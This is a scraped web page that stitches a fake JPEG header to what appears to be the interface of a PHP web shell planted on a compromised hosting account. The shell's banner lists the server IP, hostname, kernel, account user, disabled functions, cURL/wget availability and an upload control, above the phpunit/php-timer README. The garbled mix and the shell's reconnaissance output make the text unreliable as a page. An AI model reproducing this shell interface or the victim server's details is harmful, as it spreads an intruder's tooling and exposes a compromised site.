���� JFIF fdasasfas213sdaf
Server IP : 93.127.173.48 / Your IP : 216.73.216.210 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/aluminiumplant.com/public_html/vendor/phpunit/php-timer/ |
Upload File : |
[](https://travis-ci.org/sebastianbergmann/php-timer) # phpunit/php-timer Utility class for timing things, factored out of PHPUnit into a stand-alone component. ## Installation You can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/): composer require phpunit/php-timer If you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency: composer require --dev phpunit/php-timer ## Usage ### Basic Timing ```php use SebastianBergmann\Timer\Timer; Timer::start(); // ... $time = Timer::stop(); var_dump($time); print Timer::secondsToTimeString($time); ``` The code above yields the output below: double(1.0967254638672E-5) 0 ms ### Resource Consumption Since PHP Startup ```php use SebastianBergmann\Timer\Timer; print Timer::resourceUsage(); ``` The code above yields the output below: Time: 0 ms, Memory: 0.50MB